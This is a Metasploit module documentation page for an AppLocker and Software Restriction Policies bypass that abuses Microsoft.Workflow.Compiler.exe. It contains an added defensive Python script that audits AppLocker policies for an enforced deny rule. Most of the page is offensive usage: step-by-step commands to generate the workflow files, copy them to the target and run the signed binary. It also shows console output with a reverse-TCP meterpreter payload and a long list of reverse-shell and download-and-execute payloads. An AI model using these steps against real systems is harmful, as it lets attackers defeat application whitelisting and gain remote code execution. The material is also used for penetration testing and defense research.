Applocker Evasion - Microsoft Workflow Compiler - Metasploit
This page contains detailed information about how to use the evasion/windows/applocker_evasion_workflow_compiler Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Applocker Evasion - Microsoft Workflow Compiler
Module: evasion/windows/applocker_evasion_workflow_compiler
Source code: modules/evasion/windows/applocker_evasion_workflow_compiler.rb
Disclosure date: -
Last modification time: 2019-08-08 18:48:10 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will assist you in evading Microsoft Windows AppLocker and Software Restriction Policies. The technique uses the Microsoft-signed binary Microsoft.Workflow.Compiler.exe to execute user-supplied code.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use evasion/windows/applocker_evasion_workflow_compiler
msf evasion(applocker_evasion_workflow_compiler) > show options
... show and set options ...
msf evasion(applocker_evasion_workflow_compiler) > exploit
Knowledge Base
Introduction
This module is designed to evade solutions such as Software Restriction Policies and AppLocker. AppLocker in its default configuration blocks executables (.exe, .com, .msi), scripts (.ps1, .vbs, .js) and DLLs from running out of user-controlled directories. AppLocker enforces this by whitelisting: code may only run from the protected "Program Files" and "Windows" directories and their subdirectories. The main vector for this bypass is to use the trusted binary Microsoft.Workflow.Compiler.exe to execute user-supplied code, since that binary is located within the trusted Windows directory.
Vulnerable Application
This evasion works on all versions of Windows that include .NET 3.5 or later and have AppLocker or Software Restriction Policies active without an explicit rule blocking Microsoft.Workflow.Compiler.exe or the "Microsoft.Net" directory.
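A check that follows from the paragraph above: whether an effective AppLocker policy actually contains an enforced rule denying Microsoft.Workflow.Compiler.exe, rather than only the default allow rules for the Windows and Program Files folders. This is an added example, not code from the Metasploit module or its documentation. It parses two constructed policies written in the XML layout that Get-AppLockerPolicy -Effective -Xml exports; the rule GUIDs, rule names and the publisher deny rule are assumptions made for illustration. The first policy is the default-rule set the Introduction describes (the weak case), the second is the same set plus a deny rule (the corrected case).

```python
"""Audit an exported AppLocker policy for an enforced deny on Microsoft.Workflow.Compiler.exe.
Added example, not code from the Metasploit module or its documentation. Both policies are
constructed samples in the AppLocker XML layout; GUIDs and rule names are placeholders."""
import fnmatch
import xml.etree.ElementTree as ET

# Location quoted in the module output; the version directory varies per host.
TARGET_PATH = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"

# AppLocker path variables and their expansion on a default install (system drive assumed to be C:).
PATH_VARS = {"%WINDIR%": r"C:\Windows", "%PROGRAMFILES%": r"C:\Program Files", "%OSDRIVE%": "C:"}

# Constructed sample 1: the default Exe rules only, i.e. the configuration the Introduction
# describes (everything under Windows and Program Files is allowed, nothing is denied).
DEFAULT_ONLY_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="(Default Rule) All files located in the Program Files folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="(Default Rule) All files located in the Windows folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""

# Constructed sample 2: the same defaults plus a publisher deny rule for the binary.
# Within an AppLocker rule collection, explicit deny rules take precedence over allow rules.
DENY_RULE = r"""    <FilePublisherRule Id="00000000-0000-0000-0000-000000000003" Name="Deny Microsoft.Workflow.Compiler.exe" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" ProductName="*" BinaryName="MICROSOFT.WORKFLOW.COMPILER.EXE">
          <BinaryVersionRange LowSection="*" HighSection="*" />
        </FilePublisherCondition>
      </Conditions>
    </FilePublisherRule>
"""
HARDENED_POLICY = DEFAULT_ONLY_POLICY.replace("  </RuleCollection>", DENY_RULE + "  </RuleCollection>")


def expand(pattern):
    """Substitute AppLocker path variables so a rule pattern can be compared with a real path."""
    for var, value in PATH_VARS.items():
        pattern = pattern.replace(var, value)
    return pattern


def path_condition_matches(cond, target_path):
    # AppLocker path rules are case-insensitive and use '*' as the wildcard.
    return fnmatch.fnmatchcase(target_path.lower(), expand(cond.get("Path", "")).lower())


def publisher_condition_matches(cond, target_path):
    # Publisher rules key on the binary name in the signed file's version resource;
    # '*' means every binary from that publisher/product.
    name = cond.get("BinaryName", "*")
    return name == "*" or name.lower() == target_path.rsplit("\\", 1)[-1].lower()


def exe_collection(policy_xml):
    root = ET.fromstring(policy_xml)
    for coll in root.iter("RuleCollection"):
        if coll.get("Type") == "Exe":
            return coll
    return None


def is_enforced(policy_xml):
    """Deny rules only bite when the Exe collection is Enabled (AuditOnly merely logs)."""
    coll = exe_collection(policy_xml)
    return coll is not None and coll.get("EnforcementMode") == "Enabled"


def explicit_denies(policy_xml, target_path=TARGET_PATH):
    """Names of Deny rules in the Exe collection whose conditions cover target_path."""
    coll = exe_collection(policy_xml)
    hits = []
    for rule in (coll if coll is not None else []):
        if rule.get("Action") != "Deny":
            continue
        covered = any(path_condition_matches(c, target_path) for c in rule.iter("FilePathCondition")) \
            or any(publisher_condition_matches(c, target_path) for c in rule.iter("FilePublisherCondition"))
        if covered:
            hits.append(rule.get("Name"))
    return hits


def audit(policy_xml, target_path=TARGET_PATH):
    """'blocked' when an enforced deny rule covers the binary, otherwise 'reachable'."""
    return "blocked" if is_enforced(policy_xml) and explicit_denies(policy_xml, target_path) else "reachable"


if __name__ == "__main__":
    for label, policy in (("default rules only", DEFAULT_ONLY_POLICY), ("with deny rule", HARDENED_POLICY)):
        print(f"{label}: {audit(policy)} {explicit_denies(policy)}")
```

Run against a real export, the same logic tells you whether the "Microsoft.Net" directory or this binary is covered by a deny that is actually enforced; a deny rule sitting in an AuditOnly collection reports as reachable on purpose.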
Options
- XOML_FILE - Filename for the .xoml file (default: workflow.xoml).
- XML_FILE - Filename for the .xml file (default: workflow.xml).
Verification Steps
- Start msfconsole
- Do: use evasion/windows/applocker_evasion_workflow_compiler
- Do: set PAYLOAD <payload>
- Do: run
- The module will now display instructions on how to proceed:
[+] workflow.xoml stored at /root/.msf4/local/workflow.xoml
[+] workflow.xml stored at /root/.msf4/local/workflow.xml
[*] Copy workflow.xoml and workflow.xml to the target
[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\Microsoft.Workflow.Compiler.exe workflow.xml GQi
Replace [.NET Version] with the version directory present on the target (typically "v4.0.30319").
References
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
Msfconsole Usage
Here is how the windows/applocker_evasion_workflow_compiler evasion module looks in the msfconsole:
msf6 > use evasion/windows/applocker_evasion_workflow_compiler
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show info
Name: Applocker Evasion - Microsoft Workflow Compiler
Module: evasion/windows/applocker_evasion_workflow_compiler
Platform: Windows
Arch: x86, x64
Privileged: No
License: MSF_LICENSE
Rank: Normal
Provided by:
Nick Tyrer <@NickTyrer>
Matt Graeber
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
XML_FILE workflow.xml yes Filename for the .xml file (default: workflow.xml)
XOML_FILE workflow.xoml yes Filename for the .xoml file (default: workflow.xoml)
Description:
This module will assist you in evading Microsoft Windows Applocker
and Software Restriction Policies. This technique utilises the
Microsoft signed binaries Microsoft.Workflow.Compiler.exe to execute
user supplied code.
References:
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
Module Options
This is a complete list of options available in the windows/applocker_evasion_workflow_compiler evasion module:
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show options
Module options (evasion/windows/applocker_evasion_workflow_compiler):
Name Current Setting Required Description
---- --------------- -------- -----------
XML_FILE workflow.xml yes Filename for the .xml file (default: workflow.xml)
XOML_FILE workflow.xoml yes Filename for the .xoml file (default: workflow.xoml)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Evasion target:
Id Name
-- ----
0 Microsoft Windows
Advanced Options
Here is a complete list of advanced options supported by the windows/applocker_evasion_workflow_compiler evasion module:
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show advanced
Module advanced options (evasion/windows/applocker_evasion_workflow_compiler):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Evasion Targets
Here is a list of targets (platforms and systems) supported by the windows/applocker_evasion_workflow_compiler evasion module:
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show targets
Evasion targets:
Id Name
-- ----
0 Microsoft Windows
Compatible Payloads
This is a list of possible payloads which are compatible with the windows/applocker_evasion_workflow_compiler evasion module:
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
6 payload/windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
7 payload/windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
8 payload/windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
9 payload/windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
10 payload/windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
11 payload/windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
12 payload/windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
13 payload/windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
14 payload/windows/dllinject/find_tag normal No Reflective DLL Injection, Find Tag Ordinal Stager
15 payload/windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
16 payload/windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
17 payload/windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy
18 payload/windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
19 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
20 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
21 payload/windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
22 payload/windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
23 payload/windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
24 payload/windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
25 payload/windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
26 payload/windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
27 payload/windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
28 payload/windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
29 payload/windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute
30 payload/windows/exec normal No Windows Execute Command
31 payload/windows/loadlibrary normal No Windows LoadLibrary Path
32 payload/windows/messagebox normal No Windows MessageBox
33 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
34 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
35 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
36 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
37 payload/windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
38 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
39 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
40 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
41 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
42 payload/windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
43 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
44 payload/windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
45 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
46 payload/windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
47 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
48 payload/windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
49 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
50 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
51 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
52 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
53 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
54 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
55 payload/windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
56 payload/windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
57 payload/windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
58 payload/windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
59 payload/windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
60 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
61 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
62 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
63 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
64 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
65 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
66 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
67 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
68 payload/windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
69 payload/windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
70 payload/windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
71 payload/windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
72 payload/windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
73 payload/windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
74 payload/windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
75 payload/windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
76 payload/windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
77 payload/windows/patchupdllinject/find_tag normal No Windows Inject DLL, Find Tag Ordinal Stager
78 payload/windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
79 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
80 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
81 payload/windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
82 payload/windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
83 payload/windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
84 payload/windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
85 payload/windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
86 payload/windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
87 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
88 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
89 payload/windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
90 payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
91 payload/windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
92 payload/windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
93 payload/windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
94 payload/windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
95 payload/windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
96 payload/windows/patchupmeterpreter/find_tag normal No Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager
97 payload/windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
98 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
99 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
100 payload/windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
101 payload/windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
102 payload/windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
103 payload/windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
104 payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
105 payload/windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
106 payload/windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
107 payload/windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
108 payload/windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
109 payload/windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
110 payload/windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
111 payload/windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
112 payload/windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
113 payload/windows/peinject/bind_tcp_rc4 normal No Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
114 payload/windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
115 payload/windows/peinject/find_tag normal No Windows Inject PE Files, Find Tag Ordinal Stager
116 payload/windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
117 payload/windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
118 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
119 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
120 payload/windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
121 payload/windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
122 payload/windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
123 payload/windows/peinject/reverse_tcp_rc4 normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
124 payload/windows/peinject/reverse_tcp_rc4_dns normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
125 payload/windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
126 payload/windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
127 payload/windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
128 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
129 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
130 payload/windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
131 payload/windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
132 payload/windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
133 payload/windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
134 payload/windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
135 payload/windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
136 payload/windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
137 payload/windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
138 payload/windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
139 payload/windows/shell/find_tag normal No Windows Command Shell, Find Tag Ordinal Stager
140 payload/windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
141 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
142 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
143 payload/windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
144 payload/windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
145 payload/windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
146 payload/windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
147 payload/windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
148 payload/windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
149 payload/windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
150 payload/windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
151 payload/windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline
152 payload/windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
153 payload/windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
154 payload/windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
155 payload/windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
156 payload/windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
157 payload/windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
158 payload/windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
159 payload/windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
160 payload/windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
161 payload/windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
162 payload/windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
163 payload/windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
164 payload/windows/upexec/find_tag normal No Windows Upload/Execute, Find Tag Ordinal Stager
165 payload/windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
166 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
167 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
168 payload/windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
169 payload/windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
170 payload/windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
171 payload/windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
172 payload/windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
173 payload/windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
174 payload/windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
175 payload/windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
176 payload/windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
177 payload/windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
